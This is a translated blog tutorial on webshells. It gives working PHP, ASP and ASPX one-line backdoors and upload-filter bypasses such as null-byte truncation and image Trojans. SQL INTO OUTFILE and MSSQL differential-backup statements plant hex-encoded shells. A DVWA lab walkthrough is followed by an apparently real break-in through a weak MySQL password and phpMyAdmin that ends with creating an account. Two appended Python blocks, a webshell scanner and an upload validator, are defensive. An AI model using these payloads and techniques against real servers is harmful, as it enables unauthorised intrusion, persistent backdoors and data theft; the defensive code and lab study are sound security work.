2022-08-02 03:12:00 【wespten】
1. Introduction to Webshells
One day the company's network operations staff found that the company's business system had been attacked: a Trojan had been planted, company data had been leaked, and the attacker had left a backdoor behind.
A webshell is a command-execution environment that exists in the form of a web page file such as asp, php, jsp or cgi. It grants the ability to operate on the web server, so it can also be described as a web page backdoor. Webshells are normally used by site administrators for site and server management, but because a webshell is so powerful (it can upload and download files, browse the database, and even invoke system commands on the server such as creating users or modifying and deleting files), it is commonly abused by attackers.
After breaking into a website, an attacker usually mixes an asp or php backdoor file in with the normal web page files in the server's web directory: the self-written webshell is uploaded into the page directory of the web server, and the intrusion then continues either by accessing that page directly or by inserting a one-sentence Trojan and connecting to it with a local client tool, in order to gain control of the web server.
2. Types of Webshells
The Trojans discussed first here are the bulky ("庞大") ones, which hackers also call "大马" (big Trojans).
A big Trojan is many times larger than a small one, but its functions are correspondingly powerful: file management, command execution, database management, decompression and privilege escalation are all well supported. Once a big Trojan has been planted on a site, the site is essentially under its control. Its concealment is poor, however, because it contains a lot of sensitive code that security scanners pick up easily.
A one-sentence Trojan by itself is not China Chopper (中国菜刀); Chopper's client, operating through the one-sentence Trojan, is also very powerful, and a single line of code can achieve what a big Trojan does. The small Trojan (小马) and big Trojan (大马) discussed here refer to page types: the small Trojan's main job is to help upload the big one, and it can also serve as a backup backdoor, since big Trojans are easily spotted while the small one hides more easily among the system's folders.
After submitting the password 123456 and entering the big Trojan's function list, the following figure shows the file management function:
One-sentence Trojan (一句话木马), the small Trojan (小马)
Because the big-Trojan webshell described above has received very close attention in the security field, and anti-virus and firewall software of all kinds can now recognize this "大马", keeping a big Trojan as your webshell becomes very difficult once the compromised web server has defensive software installed. So a new kind of webshell appeared: the one-sentence Trojan.
Simply put, a one-sentence Trojan is a method of submitting a short piece of code through the website's upload function so that it is inserted into the server, finally yielding a webshell. Different languages have different constructions, but the basic structure is the same: first comes the script start tag, followed by eval or execute as the core part, which fetches and executes the content that follows; that content is the value obtained from request or $_POST. If we send it from the client to the server, the server executes the script we sent, and the Trojan is in place.
One-sentence Trojans exist for the various scripting languages. They can all rely on the website's upload function or on similar places where file data is exchanged, such as avatars (image Trojans) or attachments, bypassing the front-end JS validation and exploiting back-end Windows parsing or other vulnerabilities. Then connect through China Chopper to obtain a simple webshell.
php one-sentence Trojan: <?php eval(@$_POST['password']);?>
asp one-sentence Trojan: <%eval request ("value")%> or <% execute(request("value")) %>
aspx one-sentence Trojan: <%@ Page Language="Jscript"%><%eval(Request.Item["chopper"],"unsafe");%>
php variant that writes a second one-sentence file to disk: <?php fputs( fopen('xie.php','w') , '<?php eval($_POST[xie]) ?>' ) ; ?>
But today's WAFs are well equipped, and many of them detect these common one-liners.
How the one-sentence Trojan runs
Take the php one-sentence Trojan to explain the principle:
In the PHP scripting language, eval(code) assembles code into php instructions and then executes them. Other languages use the same principle; only the function name may differ.
<?php $a="phpinfo()"; eval("echo $a; "); ?>
This is equivalent to executing the statement echo phpinfo();.
Let's look at the simplest one-sentence Trojan:
<?php @eval($_POST['attack']);?>
php code must be written inside <?php ?> so that the server recognizes it as php code and parses it.
The eval() function treats the string inside its parentheses as PHP code and executes it.
For example, eval("echo 'a'"); is in effect just echo 'a';. Now look at <?php eval($_POST['pw']); ?>: first the variable pw is received via post, say pw=echo 'a';, at which point the code becomes <?php eval("echo 'a';"); ?>. The result is as follows:
Put together, it means: receive the variable pw via the post method and execute the string in pw as php code. So whatever code you want to run, put it into the variable pw and send it by post to the one-sentence Trojan. Want to check whether there are any pornographic films on the target's hard drive? Use php functions such as opendir() and readdir(). Want to upload some to frame the site owner? Use the php function move_uploaded_file (with the matching html written properly). Want to run cmd commands? Use exec().
The precondition, of course, is that in the php configuration file php.ini safe mode is turned off (safe_mode = off), and that exec is removed from the disabled function list disable_functions = proc_open, popen, exec, system, shell_exec, making sure exec is not blocked (some CMSs remove it themselves to make certain features easier to handle).
echo '<pre>';
echo '</pre>';
Here we can see that the system command was executed directly. So by now everyone should understand why the one-sentence Trojan is described as short but powerful!
Using a file upload vulnerability, the sentence <?php @eval($_POST[value]);?> is inserted into a file on the web server; when the server executes that file, we can post data to it. The parameter used to submit the post data, value in this sentence, is called the Trojan's password. As long as the submitted data is a valid php statement, the one-sentence Trojan executes it, achieving the attacker's malicious purpose; alternatively, the local China Chopper client chopper.exe can be used to obtain and control the entire website directory.
Having introduced the principle of the one-sentence Trojan, let's discuss its pros and cons:
Disadvantage: easily detected by security software. To improve concealment, various deformed variants of the one-sentence Trojan also exist.
The attacker's goal is to get the Trojan into the target website by any means: it may be a standalone .asp, .php or .aspx file, or it may be hidden inside some existing web page.
In the example above, eval in the php file is an obvious static signature; webshell scanning tools can use it as a keyword to find this Trojan and block it.
(1) IIS directory parsing vulnerability
(2) File parsing vulnerability
(3) File name parsing
Since no whitelist is used to filter file types, file types such as asa and cer are not restricted; by default asa and cer files are handled by the same mapping as asp, so the webshell can be disguised as one of these types and uploaded.
(4) fast-CGI parsing vulnerability
When fast-CGI is enabled on the web server, upload an image xx.jpg containing a one-sentence Trojan; accessing the path xx.jpg/.php then generates a one-sentence Trojan shell.php under that path. This vulnerability exists in IIS 7.0/7.5 and in Nginx versions below 8.03.
(5) Apache parsing vulnerability
Nowadays many script upload modules allow more than just legitimate file types, and most systems also allow additional upload types to be added.
When uploading an image, name it for example 1.asp .jpg (with a space after asp). During the upload, capture the form with NC or burpsuite and replace the space after asp in the upload name with %00 (in burpsuite you can edit the HEX value directly: the space's HEX value is 20; change 20 to 00). HEX 00 means truncation and 20 means a space; with the truncation in place, the JPG check in the script is ignored and the ASP file is uploaded directly.
The php.g1f upload type: this is a php feature. As long as the last extension is not a known file type, php.g1f is run as php normally, so a shell can be obtained.
This mainly uses the back-end's access database "backup database" or "restore database" functions. Variables such as "backup database path" are not filtered, so the suffix of an arbitrary file can be changed to asp and a webshell obtained. The mssql version of the program directly reuses the code of the access version, so the sql version is still exploitable. One can also back up the website's asp files under another suffix such as .txt, which allows viewing and obtaining web page source code; access to more program information increases the chances of obtaining a webshell.
In practice there are often cases with no upload function but with an asp system running. This method can be used to view the source code and find the location of its database, creating an opportunity to insert into the database. For example, the Dvbbs (动网) forum has a database of ip addresses; in the ip management in the back-end you can insert the smallest one-sentence Trojan and then back it up as an .asp file.
On breaking through upload detection: many asp programs report the file as illegal even after the suffix is changed. Adding gif89a at the head of the .asp file and changing the suffix to gif fools the asp program's detection so the upload succeeds. Another option is to open an image file in Notepad, copy any portion of it and paste it at the head of the asp Trojan file, then change the suffix to gif and upload; this also gets past the detection. Then back it up as an .asp file and the webshell is obtained.
(1) MySQL database into outfile
The back-end needs a mysql data query function. We can use it to execute SELECT ... INTO OUTFILE to write out a php file. Because all data is stored in mysql, we can insert our webshell code into mysql and then export the shell with SELECT ... INTO OUTFILE. Entering select 0x3C3F6576616C28245F504F53545B615D293B3F3E from mysql.user into outfile '路径' in mysql produces the minimal <?eval($_POST[a]);?> Trojan; 0x3C3F6576616C28245F504F53545B615D293B3F3E is the hexadecimal of our <?eval($_POST[a]);?>. This method is common with phpmyadmin: first use a phpmyadmin path disclosure vulnerability, a typical one being http://url/phpmyadmin/libraries/select_lang.lib.php, which reveals the path; in a php environment it is easier to find the absolute path :).
It is worth mentioning that when mysql runs on a win system, the path should be written like d:\\wwwroot\\a.php. The following is a more commonly used way to export a webshell; you can also write a vbs script that adds a system administrator and export it to the startup folder, so that an administrator account is created after the system restarts:
INSERT INTO a(cmd) VALUES('<?fputs(fopen("./a.php","w"),"<?eval(\$_POST[a]);?>")?>')
select cmd from a into outfile '路径/b.php'
DROP TABLE IF EXISTS a
Accessing b.php then generates the minimal <?eval($_POST[a]);?> Trojan.
If php commands can be executed, it is much simpler; a typical representative is BO-BLOG: enter the following code in the php command box in the back-end:
<?$sa = fopen("./up/saiy.php","w");fwrite($sa,"<?eval(\$_POST[a]);?".">");fclose($sa);?>
This generates in the up directory a file named saiy.php containing <?eval($_POST[a]);?>, the smallest php Trojan; finally connect with the lanker client. In actual use you must consider whether the folder is writable. Alternatively, enter code like <?fputs(fopen("./a.php","w"),"<?eval(\$_POST[a]);?>")?>, which generates a minimal a.php Trojan in the current directory.
(2) Create a new table and write the Trojan into it
Some open-source CMSs or home-made webshells have a database management function with an sql query facility. First use create table shell(code text); to create a table named shell with a column named code of type text.
Then use insert into shell(code) values('one-sentence Trojan') to set the code column of the shell table to the one-sentence Trojan, and then, through a custom backup, back the table up as x.php;x, which is parsed as php and executed. Note that x.php;x is not guaranteed to be parsed as php: different web servers run different service programs with different filtering rules, so other forms may be needed.
(3) phpMyAdmin misconfiguration
Using database compression
The anti-download protection on the data can be circumvented so that the minimal Trojan inserted into the database runs successfully; a typical case is loveyuki's L-BLOG. Write <%eval request (chr(35))%> into the url of a friendship link, submit it, then compress the database in the database operations; it can be compressed into an .asp file, and connecting to the minimal Trojan with the Ocean (海洋) eval client yields a webshell.
Generating a webshell with an mssql differential backup
This requires the Dvbbs mssql version, but the backup can be submitted directly from a local form. First upload a fake image containing asp code in a post and note its upload path. Then write a locally submitted form with the following code:
<form action="http://网站/bbs/admin_data.asp?action=RestoreData&act=Restore" method="post">
  <p>The location of the uploaded file: <input name="Dbpath" type="text" size="80"></p>
  <p>Backup to the location: <input name="backpath" type="text" size="80"></p>
  <p><input type="submit" value="提交"></p>
</form>
Save it as .htm and run it locally; fill in the fake image's upload path in "The location of the uploaded file" and the relative path where you want the WebShell backed up in "Backup to the location"; submit, and you get the lovely WebShell. The recovery code is similar; just modify the relevant parts.
Back-ends of asp programs that cannot execute mssql commands: the Dvbbs database restore and backup are merely decoration there, since sql commands cannot be executed to back up a webshell and only some simple query commands run. An mssql differential backup can be used instead to write a webshell; generally the back-end shows the absolute path, and as long as there is an injection point the differential backup basically succeeds. Below is the main statement code for a differential backup. With an injection vulnerability in Dvbbs 7.0 one can back up a webshell by differential backup; you can also use the method mentioned above to back up conn.asp as a .txt file to get the library name.
The main code for the differential backup:
;declare @a sysname,@s varchar(4000) select @a=db_name(),@s=0x626273 backup database @a to disk=@s--
;Drop table [heige];create table [dbo].[heige] ([cmd] [image])--
;insert into heige(cmd) values(0x3C2565786563757465207265717565737428226C2229253E)--
;declare @a sysname,@s varchar(4000) select @a=db_name(),@s=0x643A5C7765625C312E617370 backup database @a to disk=@s WITH DIFFERENTIAL,FORMAT--
In this code, 0x626273 is the hexadecimal of the backup library name bbs (it can be another name such as bbs.bak); 0x3C2565786563757465207265717565737428226C2229253E is the hexadecimal of <%execute request("l")%>, the one-sentence (ip) small Trojan; 0x643A5C7765625C312E617370 is the hexadecimal of d:\web\1.asp, the path where you want the webshell backed up.
Of course the more common backup method can also be used to obtain a webshell; its only drawback is that the backup file is too large, and if the backed-up database has anti-download tables or erroneous asp code, the resulting webshell will not run. Differential backup has a relatively high success rate and greatly reduces the size of the backup file.
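Added example, not part of the original post: a small Python scanner (names are assumptions) for the static signatures discussed above, the php/asp/aspx one-liners and the fputs/fopen dropper. It goes one step beyond the page by also decoding the 0x... hex literals used in the INTO OUTFILE and differential-backup statements before matching, since that encoding is what hides the shell from a plain-text search of a query log.

```python
import re

# Signatures for the one-sentence webshells shown above. Patterns are loose
# about whitespace, '@' and quoting so trivial reformatting does not evade
# them; they are a starting point for a scanner, not a complete ruleset.
SIGNATURES = [
    ("php eval of request input",
     re.compile(rb"\beval\s*\(\s*@?\s*\$_(POST|GET|REQUEST|COOKIE)\b", re.I)),
    ("php dropper writing a second webshell",
     re.compile(rb"\b(fputs|fwrite)\s*\(\s*fopen\s*\(", re.I)),
    ("asp eval/execute of request input",
     re.compile(rb"\b(eval|execute)\s*\(?\s*request\s*\(", re.I)),
    ("aspx eval of Request.Item",
     re.compile(rb"\beval\s*\(\s*Request\.Item\s*\[", re.I)),
    ("php command execution function",
     re.compile(rb"\b(system|exec|shell_exec|passthru|popen|proc_open)\s*\(", re.I)),
]

# A MySQL/MSSQL hex literal of at least 8 bytes, e.g. 0x3C3F6576616C...
HEX_LITERAL = re.compile(rb"0x(?:[0-9a-fA-F]{2}){8,}")


def scan_bytes(data: bytes) -> list:
    """Labels of every signature that matches the raw bytes."""
    return [label for label, rx in SIGNATURES if rx.search(data)]


def scan_text(text: bytes) -> list:
    """Scan a file body or a logged SQL statement. Hex literals are decoded
    and scanned as well, because the INTO OUTFILE and differential-backup
    tricks carry the shell as 0x... rather than as readable text."""
    hits = set(scan_bytes(text))
    for m in HEX_LITERAL.finditer(text):
        decoded = bytes.fromhex(m.group(0)[2:].decode("ascii"))
        hits.update("hex-encoded: " + h for h in scan_bytes(decoded))
    return sorted(hits)


if __name__ == "__main__":
    # Constructed samples: the page's one-liners plus two SQL statements.
    SAMPLES = {
        "a.php":  b"<?php eval(@$_POST['password']);?>",
        "b.asp":  b'<%eval request ("value")%>',
        "c.aspx": b'<%eval(Request.Item["chopper"],"unsafe");%>',
        "d.php":  b"<?php fputs( fopen('xie.php','w') , '<?php eval($_POST[xie]) ?>' ) ; ?>",
        "sql-1":  b"select 0x3C3F6576616C28245F504F53545B615D293B3F3E from mysql.user into outfile '/tmp/x.php'",
        "sql-2":  b"insert into heige(cmd) values(0x3C2565786563757465207265717565737428226C2229253E)",
        "ok.php": b"<?php echo 'hello'; ?>",
    }
    for name, body in SAMPLES.items():
        print(f"{name:8s} -> {scan_text(body) or 'clean'}")
```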
4. Uploading a WebShell through the DVWA file upload vulnerability
Code analysis: when a file is uploaded, the server performs no checks or filtering on the type or content of the uploaded file, an obvious file upload vulnerability; after generating the upload path, the server checks whether the upload succeeded and returns the corresponding message.
Conditions for exploiting a file upload vulnerability:
- The Trojan file can be uploaded successfully
- The uploaded file can be executed
- The path of the uploaded file is known
if( isset( $_POST[ 'Upload' ] ) ) {
    // Where are we going to be writing to?
    $target_path  = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";
    // The client-supplied file name is used as-is: no type or content check at all
    $target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] );

    // Can we move the file to the upload folder?
    if( !move_uploaded_file( $_FILES[ 'uploaded' ][ 'tmp_name' ], $target_path ) ) {
        // No
        echo '<pre>Your image was not uploaded.</pre>';
    }
    else {
        // Yes!
        echo "<pre>{$target_path} succesfully uploaded!</pre>";
    }
}
First prepare a php version of the one-sentence Trojan; note that it must be of php type.
We find that the upload succeeds and the server returns the upload path, as shown below:
Right-click in China Chopper, choose Add, and enter the shell address. Where does this shell address come from? From the file you uploaded in the browser: look at the address above, vulnerabilities/upload/#; the first two parts are your own IP and DVWA-master (for some people it is dvwa), plus the server's upload path hackable/uploads/mua.php. The red box is the password after POST in the php file from just now.
1. The connection URL: the site's main path plus the save path echoed when the file was uploaded;
2. The password for the Chopper connection: the data submitted in the one-sentence Trojan in the picture above (here "jyx");
3. The parsing type of the one-sentence Trojan: asp, php or aspx. Different parsing types have different one-sentence contents and different file extensions.
You can also open a terminal.
Code analysis: the function restricts the type and size of uploaded files: the type must be image/jpeg or image/png, and the file size cannot exceed 100000 B (about 97.6 KB).
if( isset( $_POST[ 'Upload' ] ) ) {
    // Where are we going to be writing to?
    $target_path  = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";
    $target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] );

    // File information
    $uploaded_name = $_FILES[ 'uploaded' ][ 'name' ];
    // 'type' is the Content-Type sent by the browser, so the client controls it
    $uploaded_type = $_FILES[ 'uploaded' ][ 'type' ];
    $uploaded_size = $_FILES[ 'uploaded' ][ 'size' ];

    // Is it an image?
    if( ( $uploaded_type == "image/jpeg" || $uploaded_type == "image/png" ) &&
        ( $uploaded_size < 100000 ) ) {

        // Can we move the file to the upload folder?
        if( !move_uploaded_file( $_FILES[ 'uploaded' ][ 'tmp_name' ], $target_path ) ) {
            // No
            echo '<pre>Your image was not uploaded.</pre>';
        }
        else {
            // Yes!
            echo "<pre>{$target_path} succesfully uploaded!</pre>";
        }
    }
    else {
        // Invalid file
        echo '<pre>Your image was not uploaded. We can only accept JPEG or PNG images.</pre>';
    }
}
First change the php file's type to png, upload it, and it succeeds.
Connecting directly with Chopper now will certainly fail, because Chopper cannot parse a png type file.
At this point the file inclusion operation begins; type in Chopper's add address bar:
In theory the web shell can be obtained, but I tried many times without a successful connection QAQ (I don't know why either; it is said to be the platform).
Connect with Chopper.
You can upload a file named hack.php%00.png; upload it, capture the packet, and you can see that the type meets the requirements and the upload succeeds; then connect with Chopper again.
if( isset( $_POST[ 'Upload' ] ) ) {
    // Where are we going to be writing to?
    $target_path  = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";
    $target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] );

    // File information
    $uploaded_name = $_FILES[ 'uploaded' ][ 'name' ];
    // Extension = everything after the last '.' of the client-supplied name
    $uploaded_ext  = substr( $uploaded_name, strrpos( $uploaded_name, '.' ) + 1);
    $uploaded_size = $_FILES[ 'uploaded' ][ 'size' ];
    $uploaded_tmp  = $_FILES[ 'uploaded' ][ 'tmp_name' ];

    // Is it an image?
    if( ( strtolower( $uploaded_ext ) == "jpg" || strtolower( $uploaded_ext ) == "jpeg" || strtolower( $uploaded_ext ) == "png" ) &&
        ( $uploaded_size < 100000 ) &&
        getimagesize( $uploaded_tmp ) ) {

        // Can we move the file to the upload folder?
        if( !move_uploaded_file( $uploaded_tmp, $target_path ) ) {
            // No
            echo '<pre>Your image was not uploaded.</pre>';
        }
        else {
            // Yes!
            echo "<pre>{$target_path} succesfully uploaded!</pre>";
        }
    }
    else {
        // Invalid file
        echo '<pre>Your image was not uploaded. We can only accept JPEG or PNG images.</pre>';
    }
}
The strrpos() and getimagesize() functions were added. The source shows stricter restrictions on the format of uploaded files: the file name must be one of "*.jpg", "*.jpeg" or "*.png", and the header of the uploaded file must be of an image type.
strrpos() function: finds the position of the last occurrence of a string inside another string. Here it locates the "." character in the file name.
getimagesize() function: gets the size and related information of an image; it returns an array on success, and on failure returns FALSE and raises an E_WARNING.
We need to act: merge a one-sentence Trojan file and an image into a single image-type file, as follows:
First change the suffix of the image file to txt.
Open this txt file and append the one-sentence Trojan at the end (<?php @eval($_POST['jyx']); ?>).
Because it is an image Trojan, the PHP script is not parsed, and the Chopper connection fails.
Since the image Trojan cannot be parsed, what then? The High level only allows uploading images... Don't panic: combined with the file inclusion vulnerability module that ships with the DVWA practice range, a PHP Trojan can be uploaded successfully and connected with Chopper. The attack demonstration follows.
First create a new image Trojan by the method above, changing the PHP script at the end of the image file to:
<?php fputs(fopen('muma.php','w'),'<?php @eval($_POST[hack]);?>'); ?>
Then make the new image Trojan, as shown below:
Upload it to DVWA, then access the Trojan file with the help of the file inclusion vulnerability module:
At this point a PHP one-sentence Trojan script file muma.php is generated automatically under the path of DVWA's file inclusion vulnerability.
Connect with Chopper now, and the connection succeeds:
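Added example, not part of DVWA or the original post: the upload check that all three DVWA levels are missing, written in Python (function names, policy values and the upload directory are assumptions). It whitelists the extension after the last dot, trusts magic bytes instead of the client's Content-Type, stores the file under a random name, and refuses NUL bytes and script markers, so each bypass described above (spoofed type, hack.php%00.png, x.php;x, the picture Trojan) is rejected.

```python
import os
import re
import secrets
from typing import Tuple

# Policy values assumed for this example (not DVWA's own settings).
MAX_SIZE = 100_000                 # bytes, the same cap DVWA uses
UPLOAD_DIR = "/var/app/uploads"    # assumed: outside the web root, never executed or include()d

# Allowed extension -> magic bytes the body must start with. The browser's
# Content-Type header is ignored: the client controls it (medium-level bypass).
ALLOWED = {
    "jpg":  (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "png":  (b"\x89PNG\r\n\x1a\n",),
    "gif":  (b"GIF87a", b"GIF89a"),
}

# Script markers that should never appear in an image; a GIF89a/JPEG header
# followed by <?php ... ?> is the picture-Trojan trick from the high level.
SCRIPT_MARKERS = re.compile(rb"<\?|<%|<script", re.IGNORECASE)


def validate_upload(original_name: str, data: bytes) -> Tuple[bool, str, str]:
    """Return (accepted, reason, stored_name). The stored name is random and
    keeps only the whitelisted extension, so nothing from the client's file
    name (spaces, ';', NUL bytes, double extensions) ever reaches the disk."""
    if not data or len(data) > MAX_SIZE:
        return False, "size", ""
    # 'hack.php%00.png' relies on a NUL truncating the name; refuse it outright.
    if any(ord(c) < 0x20 or ord(c) == 0x7F for c in original_name):
        return False, "control character in filename", ""
    base = os.path.basename(original_name)
    if "." not in base:
        return False, "no extension", ""
    # Extension = everything after the LAST dot: 'x.php;x', 'php.g1f' and
    # 'shell.php' all fail the whitelist here, whatever Content-Type says.
    ext = base.rsplit(".", 1)[1].lower()
    if ext not in ALLOWED:
        return False, "extension not allowed", ""
    # The body must really begin like that image type (magic bytes).
    if not data.startswith(ALLOWED[ext]):
        return False, "magic bytes do not match extension", ""
    # Defence in depth against polyglots. This is a heuristic (binary image
    # data can contain '<?' by chance); the real control is that UPLOAD_DIR is
    # outside the web root, so even a polyglot is never run as PHP.
    if SCRIPT_MARKERS.search(data):
        return False, "script marker inside image", ""
    stored_name = secrets.token_hex(16) + "." + ext
    return True, "ok", stored_name


def save_upload(original_name: str, data: bytes) -> str:
    """Validate and write the file under its random name; '' if rejected."""
    ok, _reason, stored_name = validate_upload(original_name, data)
    if not ok:
        return ""
    os.makedirs(UPLOAD_DIR, exist_ok=True)
    with open(os.path.join(UPLOAD_DIR, stored_name), "wb") as fh:
        fh.write(data)
    return stored_name
```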
Converting the WebShell to txt form for transmission
Find a host with a MYSQL weak password on port 3306 and connect to it remotely with MYSQL:
The prompt above shows that we have connected to the host through MYSQL.
When we try to import a file remotely, it tells us we do not have enough permission and cannot create and execute functions. Many people would give up at this point and move on to another host; why not spend a little more time and see whether there is another way?
Let's scan the ports again and see whether anything else is available.
The host just showed port 80 open; open IE and look at the homepage.
The WEB root has no default page and no custom error page is set, so the folders in the WEB directory are listed. We see the PHPMYADMIN management tool; I wrote earlier about using PHPMYADMIN for privilege escalation, so let's try it.
Click the phpMyadmin directory in IE to open the management page. On the right side of the page there is an item "显示PHP信息" (Show PHP information); this is crucial, since we need it to determine the WEB absolute path. Once we know the absolute path we can proceed to the next step.
Click "显示PHP信息" to show all relevant information about this host; we only need to look for the WEB absolute path.
The WEB absolute path is the directory c:/program files/apache group/apache/htdocs. OK, with the absolute path in hand, on to PHPMYADMIN privilege escalation. Open the PHPMYADMIN management page and choose one of the database tables on the left, for example mysql or test.
After selecting the database, click the SQL option at the top of the page; this is where MYSQL statements are run.
Then enter our command in the query bar: create a table nzhack with a field niuzu in it, write a one-sentence PHP WEBSHELL into it, and export the WEBSHELL to the WEB directory as nzhack.php.
When done, click execute and wait for the result.
A disappointing result: it reports a run error and fails. So try converting with an editing tool: convert the PHP-Webshell I usually use into hex code, giving 0x3c3f0d0a2f2a0d0a2d2d2d2d2b2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2... (abbreviated). Then copy it into a TXT file and add the MYSQL statement, taking care to enter the other party's WEB path accurately. The finished content is:
Once ready, run the CMD command to connect to the other party's database and enter the instruction: \. Nzhack.txt, then press Enter.
After running, it shows that the file was exported successfully. Now open IE and enter the other party's IP and WEBSHELL address: http://
We have obtained the WEBSHELL; let's try to create a user.
The user was created successfully. The purpose of this article is to remind me to think more when encountering difficult problems: think broadly, do not limit yourself to one approach, try several times, and the chances of success improve greatly.
JSP WebShell backdoor script
